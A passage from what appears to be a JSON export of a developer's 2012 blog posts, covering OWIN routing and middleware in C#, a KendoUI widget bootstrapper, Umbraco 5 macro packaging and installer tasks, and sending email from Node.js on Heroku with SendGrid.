the value to provide into our handler, maybe we can get away with just sub-stringing here?\nPattern matching… hmm that’s an interesting one, but you know what it’s not really that hard, there’s a very simple way to do pattern matching… Regex!\nRegex ALL the things! Let’s say we want this URL to match:\n/users/1234/unsubscribe/email@mail.com The URL has two static sections to it, /users/ and /unsubscribe/, it also has two dynamic sections, something that we can assume is an id and an email address. Both of these segments likely to be useful within our handler so we’d want to be able to capture them. And if we think about the id segment it’s likely we have some kind of a pattern that could represent it and for the email we just want to capture it (althought it’s true we could also put a pattern in place to match the email but email matching is complex so I don’t want to match it in our URL, that’s for the business logic to validate).\nNow let’s look at a pattern for the URL to meet our requirements:\n/users/(?<id>\\d{1,5})/unsubscribe/:email Alright that’s looking good, we’ve got a regex to restrict our id to be what we have known in our system and we’ve said we want to capture the email, but how would we actually match that URL? The answer… regex the whole URL (regardless of whether I now have two problems)! The reason I want to regex the URL is otherwise we have to do a bunch of string splitting, manipulation and guff code just to match all the segments, which is really what we are doing in a Regex itself.\nSo I’m going to start with a new extension methods class called Routing and we’ll focus on processing GET requests (and can refactor later for the other verbs). Inside this class I’m going to create a private method to break down our URL pattern into something that’ll actually match:\nprivate static Regex RouteToRegex(string route) { throw new NotImplementedException(); } The first thing I want to do is split out each segment of the URL:\nprivate static Regex RouteToRegex(string route) { var parts = route.Split(new[] { "/" }, StringSplitOptions.RemoveEmptyEntries).AsEnumerable(); throw new NotImplementedException(); } This gives us an array like so:\nparts[0] == "users" parts[1] == "(?<id>\\d{1,5})" parts[2] == "unsubscribe" parts[3] == ":email" Well then, three out of those four parts look like regexs already, want to match the work users, well users will do that. Want to capture a number one to five characters in length, well we’ve got a named capture group for that too. The only thing that doesn’t look like a regex is :email, but is something that looks unique and we could match against.\nNow we need to go through the array and find any of these :email-esq values and turn them into named catch-all groups as that’s what we want to do. Again, regex comes to the rescue, and with this I’m going to some LINQ trickery:\nprivate static readonly Regex paramRegex = new Regex(@":(?<name>[A-Za-z0-9_]*)", RegexOptions.Compiled); private static Regex RouteToRegex(string route) { var parts = route.Split(new[] { "/" }, StringSplitOptions.RemoveEmptyEntries).AsEnumerable(); parts = parts.Select(part => !paramRegex.IsMatch(part) ? part : string.Join("", paramRegex.Matches(part) .Cast<Match>() .Where(match => match.Success) .Select(match => string.Format( "(?<{0}>.+?)", match.Groups["name"].Value.Replace(".", @"\\.") ) ) ) ); throw new NotImplementedException(); } First off I’ve created a regex to match our catch-all which resides in the static field. Next I’m going to go through each of the URL segments and if they aren’t a match to the pattern then they are already regexable and we’ll just return them, otherwise we’ll get all the matches and then them into the named catch-all capture group. Our array will then look like this:\nparts[0] == "users" parts[1] == "(?<id>\\d{1,5})" parts[2] == "unsubscribe" parts[3] == "(?<email>.+?)" Lastly we’ll rejoin all the regex parts with / separators so that it is back to being a URL as well as put start and end terminators (we’ll also make it case-insensitive and compile the regex for speed):\nprivate static Regex RouteToRegex(string route) { var parts = route.Split(new[] { "/" }, StringSplitOptions.RemoveEmptyEntries).AsEnumerable(); parts = parts.Select(part => !paramRegex.IsMatch(part) ? part : string.Join("", paramRegex.Matches(part) .Cast<Match>() .Where(match => match.Success) .Select(match => string.Format( "(?<{0}>.+?)", match.Groups["name"].Value.Replace(".", @"\\.") ) ) ) ); return new Regex("^/" + string.Join("/", parts) + "$", RegexOptions.Compiled | RegexOptions.IgnoreCase); } Ta-Da! We now have a matching algorithm like so:\n^/users/(?<id>\\d{1,5})/unsubscribe/(?<email>.+?)$ Paste that into your favourite regex tester and take it for a whirl!\nMatching our routeNow that we can match our route maybe we should expose that. As I said we’ll create an extension method that allows us to do this:\npublic static IAppBuilder Get(this IAppBuilder builder, string route, Action<Request, Response> app) { throw new NotImplementedException(); } This looks like the one from the last post but we’re taking in a route as the first argument, meaning we can do:\nbuilder.Get(@"/users/(?<id>\\d{1,5})/unsubscribe/:email", (req, res) => { res.ContentType = "text/plain"; res.End("Unsibscribed\\r\\b"); }); The logic of this method isn’t going to be much different to the ones from the last post with the addition of doing a match against our regex:\npublic static IAppBuilder Get(this IAppBuilder builder, string route, Action<Request, Response> app) { var regex = RouteToRegex(route); return builder.Use<AppDelegate>(next => (env, result, fault) => { var path = (string)env["owin.RequestPath"]; if (path.EndsWith("/")) { path = path.TrimEnd('/'); } if ((string)env["owin.RequestMethod"] == "GET" && regex.IsMatch(path)) { var req = new Request(env); var res = new Response(result); app(req, res); } else { next(env, result, fault); } }); } So up front we create our regex and then inside the handler we will match against it as well as checking the Request verb. You’ll see that we’re getting the URL (path) out, again this comes from the OWIN Environment Variables. The only other thing we’re doing is stripping the trailing /. This is more personal preference (and I’m sure some SEO expert can give a good reason for it) but you don’t have to remove it if you don’t want, you’d just have to ensure the regex can handle that scenario.\nBut now we’re able to filter the requests by URL and it’s all going to track nicely for us!\nCapturing our URL segmentsAs I said earlier in the post generally when we have a specific URL segment to match we do that because we care about the value and we’ll be wanting it in our handler. Currently though we’re not passing that in are we? Well we should solve that! At the moment I’m using the Gate Request object for the handler but it wont really do what I want here, at least not in an overly discoverable way (since it inherits from a Dictionary<string, object> it’s not too hard but I want to make it easier). Instead I want to extend it, so I’m going to create a superclass called RoutedRequest.\nIn the RoutedRequest class I want to surface any of the matched segments and to do this I’m going to use a helper class I wrote a while ago for using Dynamics and pass in a dictionary that represents all matched values. This makes our RoutedRequest class nice and simple:\npublic class RoutedRequest : Request { public RoutedRequest(IDictionary<string, object> env, Regex regex, string path): base(env) { var groups = regex.Match(path).Groups; var dic = regex.GetGroupNames().ToDictionary(name => name, name => groups[name].Value); UrlSegments = new DynamicDictionary<string>(dic); } public dynamic UrlSegments { get; private set; } } Now once we update the Get method we can update our handler like this:\nbuilder .Get(@"/users/(?<id>\\d{1,5})/subscribed/:email", (req, res) => { res.ContentType = "text/plain"; res.End("Email " + req.UrlSegments.email + " is subscribed.\\r\\n"); }); You’ll notice that off the req object we can go through the UrlSegments property and use dot-notation to access the email address that was submitted. This is pretty sexy if I do say so myself.\nConclusionI’ll admit that this was quite a long post as the subject of routing is a complex one. Hopefully though you’ve seen that without a lot of code we’ve made a phenomenally powerful little route engine (really, it’s quite a simple bit of code in the end).\nWhile the route that we’ve been looking at is rather complex our little engine is capable of pretty much anything, we don’t need to be putting in regexs, we can get away with routes like /home or /about as well.\nNext time we’ll look at how we can make our responses more powerful with simple helper methods.\nAs always you can check out the full code up on the GitHub repository.\n", "id": "2012-03-16-owin-routing" }, { "title": "OWIN and Middleware", "url": "https://www.aaron-powell.com/posts/2012-03-15-owin-and-middleware/", "date": "Thu, 15 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "", "content": "In my last post I looked at getting started with the basics of OWIN and how to create a server which wont do anything overly useful. In this post I want to go a step further and look at how we can start introducing our own layers on top of OWIN (and Gate) to make it nicer to do like web stuff.\nIt’s all about the modulesOne of the aims of OWIN is to be very lightweight and as we saw in the last post OWIN itself doesn’t really have anything in it and it doesn’t really do anything. This means that you’re entirely responsible for what you do and don’t have included in your server. What this means is that OWIN is very modular, it’s a mix-and-match of what you want to include in your project and if you don’t want something then don’t include the assembly, but it also means that you often have to do something yourself, and this is done through modules.\nMiddlewareIn comes the concept of Middleware; now this isn’t a new concept in software but it’s probably foreign to most .NET developers, particularly ASP.Net as we’ve always had it built in and never needed to think about it. But with OWIN it’s not so, you’ve kind of got to start from scratch.\nNow this isn’t entirely true, there’s already OWIN middleware out there like Nancy, Kayak and Gate.Middleware to name a few, but I want to introduce the concept and what to do to make a basic middleware. Really you want to be looking at existing libraries to give you what you need.\nBack in the last example we had a single method that was handling all the requests that were coming in, be they to / or /favicon.ico, a HTTP GET or POST, everything was handed to this one method. But this isn’t really ideal now is it? You can’t really expect an application to be run out of a single delegate now can you? Let’s start with a simple handler.\nHandling different verbsI want to start by making it easy to filter requests by the HTTP verb used, so I can have different handlers for GET, POST, PUT, etc. This is a pretty common scenario we’d want to handle if we’re building a RESTful service so let’s get started.\nTo implement this I want to extend the IAppBuilder interface that we came across in our last post through the use of extension methods and I’m also going to build on top of Gate for simplicities sake. So I’ll start with crating our class:\npublic static class Middleware { public static IAppBuilder Get(this IAppBuilder builder, /* todo - something goes there */) { throw new NotImplementedException(); } } So this is our extension method, we’re going to extend IAppBuilder but what will the argument(s) be that we’re passing in? Well we’re going to want something to execute, we’re going to want a delegate, and since I want the consumer of my API to be able to get pretty good control over what’s happening I’ll pass in a Request and Response object which come from Gate:\npublic static class Middleware { public static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { throw new NotImplementedException(); } } This allows me to consume the API like so:\nbuilder.Get((req, res) => { res.Status = "200 OK"; res.ContentType = "text/plain" res.Write("Hello World!\\r\\b").End(); }); But what does the implementation look like? It’s all well and good to have an API but if all it does is throw a NotImplementedException it’s kind of a shitty API…\nSo inside out Get method we need to ensure that we’re only invoking the delegate provided when it’s correct to do so, aka, when the request has come in as a HTTP GET.\nThe OWIN specification is nice enough to tell us what is happening in the request as it’s coming in through the use of a few environment variables it defines, the one of interest to us is owin.RequestMethod. From here we can work out if we actually have to do something with the request or hand it off to something else.\nThe crux of what we’re going to be coding will sit on top of the IAppBuilder.Use<TApp> method, and we’ll also return this to allow for method chaining (since Use returns an IAppBuilder) and it’ll look like so:\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { throw new NotImplementedException(); }); } The generic type we’re going to be specifying is that of AppDelegate which defines a few basic arguments (read the spec!)and ultimately allows us to do some processing. The first step of which we want to check the HTTP Verb that has come in:\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { if ((string)env["owin.RequestMethod"] == "GET") { // yay } else { // nay } }); } That’s pretty simple isn’t it, a request comes it, it gets handed to our delegate, we run a condition against and and if it matches we want to then pass that along to the handler that our API consumer provided us:\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { if ((string)env["owin.RequestMethod"] == "GET") { var req = new Request(env); var res = new Response(result); app(req, res); } else { // nay } }); } When we match our verb we’re creating a Request and Response object (these are helpers from Gate) which the handler can then manipulate. The handler is invoked (it’s the app variable) and our processing is on its way.\nBut what do we do if it’s not a GET request? Welcome to the world of delegates. You’ll notice that there was a next variable defined to represent the AppDelegate, well we haven’t used it yet, but that’s what comes into play now when you don’t want to handle the current request (or can’t), we hand it off to someone else then it’s their damn problem.\npublic static IAppBuilder Get(this IAppBuilder builder, Action<Request, Response> app) { return builder.Use<AppDelegate>(next => (env, result, fault) => { if ((string)env["owin.RequestMethod"] == "GET") { var req = new Request(env); var res = new Response(result); app(req, res); } else { next(env, result, fault); } }); } Ta-Da! We’ve got our handler that will:\nTake a delegate of something to execute when we’ve got a request When a request comes in it’ll check if matches our desired verb If it’s a matched verb then we’ll hand it to our delegate Otherwise give it back to your server for someone else to deal with it You can then go and create extensions for all the verbs you want supported as well.\nConclusionIn this post we’ve had a bit of a look at what to do to make it a bit easier to work with OWIN by starting our own layer of middleware. We created a little middleware helper to give us easy methods to provide delegates for the different HTTP verbs and hopefully given you a starting point for where you could build out other middleware features.\nNext time we’ll look at what you need to do to have routing included in your application.\nI’ve decided to create a GitHub repository which you can see the code and follow the progress of these blog posts.\n", "id": "2012-03-15-owin-and-middleware" }, { "title": "Hello OWIN", "url": "https://www.aaron-powell.com/posts/2012-03-14-hello-owin/", "date": "Wed, 14 Mar 2012 00:00:00 +0000", "tags": [ "owin", "web" ], "description": "An introduction to OWIN and building a server.", "content": "Long time readers of my blog will probably be aware that I’ve become quite a fan of Node.js. One of the things that I’ve liked about working with it is that it’s very bare bones so you’re working very closely with the HTTP pipeline, something that you don’t do with ASP.Net (WebForms in particular, MVC is much closer but still a reasonable abstraction).\nAbout 18 months ago a .NET project popped up on the radar though, a project called OWIN. OWIN isn’t really a coding project though, it’s a specification that defines how web applications and .NET web servers should communicate with each other. The nice thing about this is that is is really bare bones, like with Node.js OWIN defines a very thin layer on top of HTTP which can be very powerful.\nHello OWINSo you’ve decided you want to get started with OWIN, well where do you start?\nAs I mentioned about OWIN is really just a specification and if you read the About page it states:\nOWIN defines a single anonymous delegate signature, and therefore introduces no dependencies; there is no OWIN source code.\nThat means that you don’t actually build against OWIN*, you want to look at some of the modules built on top of it.\n*Note this isn’t entirely true, you can build against the OWIN NuGet package but it’s painfully difficult to anything :P. Check out this for an example of a Hello World on just OWIN.\nInstead you probably want to have a look at Gate, which is a set of helpers that sits on top of OWIN and makes it a bunch nicer to work with and it’s what I’m going to use in this example.\nThe first thing I wanted to do was replicate the Node.js demo of creating a basic Hello World server:\nvar http = require('http'); http.createServer(function (req, res) { res.writeHead(200, {'Content-Type': 'text/plain'}); res.end('Hello World\\n'); }).listen(1337, '127.0.0.1'); console.log('Server running at http://127.0.0.1:1337/'); So if this is our goal how do we go about it with OWIN and Gate?\nProject Setup Since there’s no Gate project template (that I’ve found) we’ll start with just a C# Class Library project. To this you’ll want to add a dependency on Gate (and that’ll include OWIN) and we’re ready to go.\nMost OWIN hosts (we’ll talk about that in a minute) use a convention that to run there needs to be a public class named Startup in the root namespace of the assembly you’re running, so we’ll make one:\npublic class Startup { public static void Configuration(IAppBuilder builder) { } } Inside our Startup class we’ve got a Configuration method (taking IAppBuilder which comes from OWIN). This method is where we will define how to handle the requests that are coming in, basically where we define our Hello World.\nCreating a configuration I’m going to use the RunDirect extension method (which resides in the Gate namespace) as it’s as close as we get to the above Node.js function structure, and it looks like this:\npublic static void Configuration(IAppBuilder builder) { builder .RunDirect((req, res) => { res.Status = "200 OK"; res.ContentType = "text/plain"; res.Write("Hello World!\\r\\n") .End(); }); } The code should be fairly easy to understand, we get two inputs and Request object and a Response object. These come from Gate (and this is why I recommend Gate over raw OWIN) and are really just dictionaries with a couple of helpful properties and methods for doings the simple stuff you’d want to be doing.\nHosting our application If you’re still following along you’ll remember me saying that OWIN is really just a specification, it defines what the communication interfaces look like but it doesn’t define how they should work, for that you’re going to need an OWIN host. The ideal way to do this is through ghost. Ghost is just an executable that you can run against a class library and spin up your project. Unfortunately I’ve been having problems running ghost so rather than looking at producing something that requires hosting we can look at making our application self hosting. For this I’m going to use Firefly as it’s a nice and simple host for OWIN applications, so go and install it from NuGet.\nNow we’ve got the dependency on Firefly we need to make an executable rather than a class library. Start by adding a Program class and a Main method like so:\nclass Program { static void Main(string[] args) { } } Then you can go into your project properties and change the output type to a Console Application and set the appropriate startup object. All easier than creating a new project I think ;).\nI’m also going to add a dependency on Gate.Builder which is another utility library that takes away some of the grunt work for setting up your application host. With this we’re going to do 3 things:\nCreate builder for our application (an implementation of IAppBuilder) Create a Firefly server Provide Firefly with our application This is what our Main method will now look like:\nstatic void Main(string[] args) { var builder = new AppBuilder(); //Tell the builder to use our configuration var app = builder.Build(Startup.Configuration); //Start up the server on port 1337 var server = new ServerFactory().Create(app, 1337); Console.WriteLine("Server running at http://127.0.0.1:1337/"); //Stay running! Console.ReadKey(); } ConclusionThere we go hit F5 and your app will be running, just the same as our initial Node.js example and the full code can be found here.\nIt turns out that this isn’t overly difficult to do, the trick is finding the various dependencies that you require, remember I use:\nGate Gate.Builder Firefly In the next post we’ll look at how to handle requests in a better fashion with a basic middleware implementation.\n", "id": "2012-03-14-hello-owin" }, { "title": "How to explain where to put your JavaScript in a page", "url": "https://www.aaron-powell.com/posts/2012-02-21-scripts-are-blocking/", "date": "Tue, 21 Feb 2012 00:00:00 +0000", "tags": [ "javascript", "just-for-fun" ], "description": "", "content": "I decided that I’m tired of explaining why you should do JavaScript combination and avoid inline scripts.\nSo here’s a comic that should explain it.\nClick for a larger version.\n", "id": "2012-02-21-scripts-are-blocking" }, { "title": "KendoUI Bootstrapper", "url": "https://www.aaron-powell.com/posts/2012-02-16-kendo-ui-bootstrapper/", "date": "Thu, 16 Feb 2012 00:00:00 +0000", "tags": [ "javascript", "kendoui" ], "description": "", "content": "For my Stats It project I’m using KendoUI as my UI widget layer (and charting) as it has several more UI widgets that I’m looking for than jQuery UI offers. But there’s one thing I hate having to do, and that’s constantly write code like this:\n$('.datePicker').kendoDatePicker(); This goes for all libraries I’ve used, you’re constantly having to bootstrap the UI widgets so that they appear. Now there’s a good reason for this, so you can pass in options, etc to setup your controls for their actual use, but I find that you end up with a lot of boilerplate code around that is doing the same thing each time and when trying to be DRY this is annoying.\nIntroducing KendoUI BootstrapperIn an effort to address the lack of DRYness in my projects I started a new library which is up on github called KendoUI Bootstrapper with the goal of solving this problem for me.\nBasically what this library does is automatically creates your KendoUI widgets for you and then exposes them out in an API so you can interact with them. This means that if you want to do anything “custom” to a widget (say set a min/ max for a date picker) you use the widget API to do it, rather than passing it in as a setting to the constructor.\nUsing KendoUI BootstrapperSay you’ve got some date pickers that you want to use, to do so you’d have something like this in your HTML:\n<input id="startDate" /> <input id="endDate" /> Then to get the bootstrapper to work you need to add a data-* attribute, in the form of data-kendo="<widget type>", so for the date pickers we now have this in our HTML:\n<input id="startDate" data-kendo="date" /> <input id="endDate" data-kendo="date" /> Next you need to add a reference to the Bootstrapper JavaScript file are tell it to do its this:\nwindow.kendo.bootstrap(); The bootstapper with augment the window.kendo object by adding a datePickers property which will have two properties of its own, one called startDate and one called endDate.\nThis kind of thing I would put in my master JavaScript file for the page so that all my widgets are setup initially for me, but in the page JavaScript that is responsible for my date range picker I would have something like this:\nvar start = window.kendo.datePickers.start, end = window.kendo.datePickers.end; var startChange = function () { var startDate = start.value(); if (startDate) { startDate = new Date(startDate); startDate.setDate(startDate.getDate() + 1); end.min(startDate); } }; var endChange = function () { var endDate = end.value(); if (endDate) { endDate = new Date(endDate); endDate.setDate(endDate.getDate() - 1); start.max(endDate); } }; start.bind('change', startChange); end.bind('change', endChange); start.max(end.value()); end.min(start.value()); end.max(new Date()); Here I’ve implemented the same code that can be found in the KendoUI demos but rather than performing some setup as part of the “construtor” for the date picker and then using the API I’m doing everything through the API. I find this more preferable as it means I have a separation of concerns, I know that in my JavaScript file I have two objects that represent what could be a date picker without having to have any dive into the HTML, it’s just a programming API. This means I can stub them out and write some tests against them, testing pure logic rather than testing against the DOM.\nLimitations At the moment this project is under development and I’m really developing it on an as needed basis, ie - if I haven’t used the widget it’s not going to be there :P. But if you want to add features then send me a pull request!\nObviously this doesn’t cater for 100% of scenarios, there will be scenarios which this wont work, and if that’s the case don’t put a data-kendo attribute on your element and wire it up yourself.\nI’ve also been told by some of the people at Telerik that there may be some problems with APIs not working as expected in KendoUI itself. If that’s the case this is a good test bed to have them find these problems and fix them so I see this as more of an opportunity to help the KendoUI team to have as good an API as possible.\n", "id": "2012-02-16-kendo-ui-bootstrapper" }, { "title": "Macros in packages", "url": "https://www.aaron-powell.com/posts/2012-01-25-macros-in-packages/", "date": "Wed, 25 Jan 2012 00:00:00 +0000", "tags": [ "umbaco", "umbraco-5", "umbraco" ], "description": "Wanting to include a Macro in your v5 package, where do you start?", "content": "So you’re working on an Umbraco 5 package and you want to be able to ship your own Macro with it. Seems like a common scenario you want to do yeah? It’s something that’s possible in v4 right? So how do you go about doing it in v5?\nSome backgroundIn v4 Macros were a bit of a pain to ship, in case you didn’t know they were stored in the database and their data model was… less than ideal mainly as they evolved from being XSLT components to also supporting .NET, Iron* and eventually Razor.\nWell here’s a fun fact about v5 Macros they aren’t in the database, Macros in v5 are actually stored in Hive. Out of the box they will be run of the file system Hive provider but since they are in Hive you could (in theory) stick them into the Database, on a FTP or anywhere crazy that you want. But really, them being on the file system is pretty fantastic as it means that it’s really easy to include them in Source Control, something that was a huge problem with the Umbraco projects I’d worked with in the past.\nYou will find your macros (by default) at the location ~/App_Data/Umbraco/Macros and this contains a serialized XML version of your macro, which looks a lot like the exported Macro definitions in v4, just not quite as confusing. Also this is a configuration value that comes from the /configuration/umbraco/macros[@rootPath] section of the web.config. Again this is something that you can change but you probably shouldn’t :P.\nInstalling Macros from your packageIn my last post I introduced tasks and again this is what you’ll want to use to install your macro with your package.\nThe first thing you want to do is copy your macro file from the Macros folder into somewhere that’ll include it in your package. I use a folder called Macros that sites at the root of my package, but it’s ultimately a personal preference thing so you can put that folder anywhere inside your package.\nSide note Matt Brailsford has a great post on how to create v5 packages, a must-read until there’s a UI to do it.\nPart of the v5 source includes a task that can help you with this and it’s called CopyFileTask and it allows you to copy a single file from one location to another. You’ll see this task used as part of the DevDataset that’s shipping with the RC builds but what you want to do is something like this:\n<add type="Umbraco.Cms.Web.Tasks.CopyFileTask, Umbraco.Cms.Web.Tasks" trigger="post-package-install"> <parameter name="source" value="Macros/MyMacro.macro" /> <parameter name="destination" value="~/App_Data/Umbraco/Macros/MyMacro.macro" /> </add> Adding that to your web.config in your packages (as described in my last post) will copy the file from the Macros folder in your package (or what ever folder you’ve put them into) to the Umbraco Macros folder.\nConclusionYes, that’s it.\nSeriously, it’s so much easier to ship Macros in v5 that v4 and the fact that they are running off disk (don’t be a dick and use some crazy Hive provider for them like Examine!) makes installing them as simple as copying a file.\nBut I think there’s some room for improvements around this still and as I work on my v5 tasks set I’m going to be doing a simpler task for installing Macros, but in the meantime the above will work nicely today.\n", "id": "2012-01-25-macros-in-packages" }, { "title": "Creating an installer task", "url": "https://www.aaron-powell.com/posts/2012-01-24-creating-an-installer-task/", "date": "Tue, 24 Jan 2012 00:00:00 +0000", "tags": [ "umbraco", "umbraco-5" ], "description": "A look at the v5 task system, particularly how to create an installer task", "content": "As you possibly know I’m working on an extension for Umbraco 5 called Stats It and I’ve initially been focusing on making the install process nice and smooth for people who want to get up and running with the package. A good install experience will do wonders for giving your project credibility.\nFor this I have had to do a bit of digging into the Task system which is coming in v5, which is acting as a replacement for the traditional .NET event system, and in this article I’m going to share some tips when building installer tasks.\nRight task for the jobIn v5 there are two kinds of tasks available, Standard Tasks (my name) and Configuration Tasks and depending on what you’re wanting to do you’ll need to choose the right kind of task. Here’s a quick overview of the two task types:\nStandard Task This is the most common type of task that you’ll be creating; a task inherits from Umbraco.Cms.Web.Tasks.AbstractWebTask and requires a Umbraco.Framework.Tasks.TaskAttribute to be added so that the Umbraco framework layer will be able to find it (and you need to provide the attribute with a Guid for identification). This task type is very basic and can be used for any task that is raised in the system and then execute a piece of code, because of this you can think of it as being very similar to the event handlers that were in the Umbraco 4 system (or that you’ll find in any .NET application).\nConfiguration Tasks This task is primarily used in the install/ uninstall process of Umbraco 5 and inherits from Umbraco.Cms.Web.Tasks.ConfigurationTask. Where the previous task type you require an attribute the Configuration Tasks don’t and you’ll get some very undesired results if you do include the attribute. The power of this task type though is it allows you to specify values in the configuration file for the task, providing static values into the task as it is executed.\nSide note - there is another task type Umbraco.Framework.Tasks.AbstractTask which is the base class for the AbstractWebTask but instead of relying on the web-side of Umbraco 5 it can be run without any web references. This would what you want if you are using the Umbraco framework outside of a web context, which it can do in-theory, but it’s well beyond the scope of this post :P.\nTask configurationIn addition to creating a class you’ll also need to add a section in your configuration file that your task definition will reside within. There are two ways to do this:\nAdd to the master web.config file (not recommended as it can have upgrade issues) Add your own package I’m going to make the assumption that you’re creating your own package here and you’ll have your own web.config that you want to work against. First off you need to ensure you have the right web.config section:\n<configuration> <configSections> <sectionGroup name="umbraco.cms"> <section name="tasks" type="Umbraco.Cms.Web.Configuration.Tasks.TasksConfiguration, Umbraco.Cms.Web" requirePermission="false" /> </sectionGroup> </configSections> </configuration> This is the basis of your web.config file (and assuming there’s nothing else in it yet) and what we’ve done is created a new web.config section called umbraco.cms and in that included the tasks section which uses a type provided by Umbraco.\nNext we need to register our tasks:\n<umbraco.cms> <tasks> <add type="MyPackages.Tasks.MyAwesomeTask, MyPackage" trigger="post-package-install" /> </tasks> </umbraco.cms> This section would appear after the </configSections> node and adds the section which we defined and then within that we add our tasks. There are two pieces of information we have to provide it:\nThe fully qualified type of our task (namespace + classname + assembly) A trigger for the task, for install tasks there is one called post-package-install So that’s the setup, now to make a task.\nCreating your first taskSo you’re working on the next awesome package for Umbraco 5 and you need some stuff to happen when you install your package, well let’s get cracking and make your first task. We’ll do a basic task which will email you on package install, kind of a basic pingback to tell you when someone has installed the package. First up we’ll make a class:\nusing System; using Umbraco.Cms.Web.Context; using Umbraco.Cms.Web.Tasks; using Umbraco.Framework; using Umbraco.Framework.Tasks; namespace TaskDemo { [Task("{C1C251E1-CACF-447A-9516-694251C16B08}", TaskTriggers.PostPackageInstall)] public class EmailOnInstall : AbstractWebTask { public EmailOnInstall(IUmbracoApplicationContext applicationContext) : base(applicationContext) { } public override void Execute(TaskExecutionContext context) { throw new NotImplementedException(); } } } This is as empty a file as you can possibly have for an Umbraco 5 task, currently this will just error on install, pretty useful!\nThe important stuff will be happening within the Execute method, this is the method that is invoked when task is run and obviously where you want to put your logic, so let’s build it out:\npublic override void Execute(TaskExecutionContext context) { var email = new MailMessage { From = new MailAddress("phone-home@demo.com") }; email.To.Add(new MailAddress("new-install@demo.com")); email.Subject = "A new install has happened!"; email.Body = "Hey dude,\\r\\nSomeone has installed your awesome package!\\r\\nH5YR!"; var smtpClient = new SmtpClient(); //server config skipped smtpClient.Send(email); } There we go, a very basic implementation of a task has been done! Here’s the config for this:\n<?xml version="1.0" encoding="utf-8" ?> <configuration> <configSections> <sectionGroup name="umbraco.cms"> <section name="tasks" type="Umbraco.Cms.Web.Configuration.Tasks.TasksConfiguration, Umbraco.Cms.Web" requirePermission="false" /> </sectionGroup> </configSections> <umbraco.cms> <tasks> <add type="TaskDemo.EmailOnInstall, TaskDemo" trigger="post-package-install" /> </tasks> </umbraco.cms> </configuration> Something you may notice is that in my config and in my class I’ve had to specify the trigger, this could be a mistake that I’ve made in my understanding thus-far but it seems to me that that is needed, someone feel free to correct me ;).\nCreating a configuration taskAs stipulated the above task is very basic but it does show you how you can work with the basics of a task. Well let’s say that you want to create something a bit more advanced, say you want to have a task that will grant permissions to your custom application when the package is installed (this is a common problem solved in the PackageActionContrib in v4). For this we’ll leverage the Configuration Task type so that we can make it a reusable task.\nusing System; using Umbraco.Cms.Web.Context; using Umbraco.Cms.Web.Tasks; using Umbraco.Framework.Tasks; namespace TaskDemo { public class GrantPermissions : ConfigurationTask { public GrantPermissions(ConfigurationTaskContext configurationTaskContext) : base(configurationTaskContext) { } public override void Execute(TaskExecutionContext context) { throw new NotImplementedException(); } } } So again we’ve got our skeleton class but this time we inherit from ConfigurationTask so that we can provide it with configuration values.\nInside the Execute method we can access the ConfigurationTaskContext.Parameters property which will contain the parameters that are passed in from our configuration file, like so:\npublic override void Execute(TaskExecutionContext context) { if (!ConfigurationTaskContext.Parameters.ContainsKey("application")) throw new ArgumentException("No application supplied"); } A simple check to make sure that we did get an application supplied, I want that as a pre-condition so that people don’t break things on me!\nBut let’s do something with the application provided:\nNote: We’re diving into the Hive here, I’m going to glance over how Hive works here, that’s beyond the scope of this article, just believe me when I say that the code does work :P\npublic override void Execute(TaskExecutionContext context) { if (!ConfigurationTaskContext.Parameters.ContainsKey("application")) throw new ArgumentException("No application supplied"); var controller = (Controller)context.EventSource; //Get the ID of the current user var id = ((UmbracoBackOfficeIdentity)controller.User.Identity).Id; //Access the Hive user store using (var uow = ApplicationContext.Hive.OpenWriter<ISecurityStore>()) { //find the current user in Hive var entity = uow.Repositories.Get<User>(id); //Add the specified app to their permissions var apps = new List<string>(entity.Applications) { ConfigurationTaskContext.Parameters["application"] }; //Update their permissions entity.Applications = apps; //Tell Hive to update the object -- possibly not needed uow.Repositories.AddOrUpdate(entity); //tell Hive that we want to save the changes to its store uow.Complete(); controller.HttpContext.CreateUmbracoAuthTicket(entity); } } I’ve put some comments inline to explain the code as it goes but the important part is that we are reading the task parameters out and adding it to the users permissions.\nOnce this is all updated it amazingly will just give a new icon in the applications tray on the install of the package!\nNow let’s have a look at the config:\n<tasks> <add type="TaskDemo.GrantPermissions, TaskDemo" trigger="post-package-install"> <parameter name="application" value="my-awesome-app" /> </add> </tasks> ConclusionWhile the code above may look a little bit scare to begin with it’s actually not that bad when it comes to creating tasks. There’s a few simple rules which you need to remember:\nPick the right type of task for your work, do you want to pass in config values or can you compile everything together? Do you need to work with anything web specific or is just the base FrameworkContext going to be enough? Make sure you subscribe to the right event! There’s a few tasks built into the core of Umbraco 5 for copying files so that can also provide a good reference source.\n", "id": "2012-01-24-creating-an-installer-task" }, { "title": "Heroku, SendGrid and NodeJS", "url": "https://www.aaron-powell.com/posts/2012-01-05-heroku-sendgrid-nodejs/", "date": "Thu, 05 Jan 2012 00:00:00 +0000", "tags": [ "nodejs", "heroku" ], "description": "A quick guide to sending emails from nodejs on Heroku using SendGrid", "content": "Last night I launched the registration site for Stats It, and Umbraco 5 add-on I’m working on and I wanted to get the site out quickly and well… cheaply so I decided that I’d just do a 1 page site in NodeJS.\nFor hosting I wanted to go with Heroku as I just love how simply I can get a site from my local machine to deployed with the platform and I also love how many add-ons there are available.\nTo send emails there’s a couple of choices, I decided to go with SendGrid for no reason other than they were the first that I saw :P.\nSo install SendGrid into your heroku app (I’m using the free version):\nheroku addons:add sendgrid:starter And now you need something to send emails from NodeJS, for this I’ve gone with node_mailer as it was the first in my search results and it’s got a dead simple API. What’s really cool about Heroku is that when you have add-ons such as SendGrid installed you get the config options injected, meaning sending an email is as simple as this:\nvar email = require('mailer'); email.send({ host: 'smtp.sendgrid.net', port: '587', authentication: 'plain', username: process.env.SENDGRID_USERNAME, password: process.env.SENDGRID_PASSWORD, domain: 'heroku.com', to: 'someone@somewhere.com', from: 'someone@somewhere-else.com', subject: 'You sent an email', body: 'Hey look at that!' }, function (err, result) { //Do your error handling }); You have to hard-code these settings:\nhost: 'smtp.sendgrid.net' port: '587' authentication: 'plain' But Heroku will inject the username & password for you, both of which will be on the process.env object, like so:\nprocess.env.SENDGRID_USERNAME process.env.SENDGRID_PASSWORD 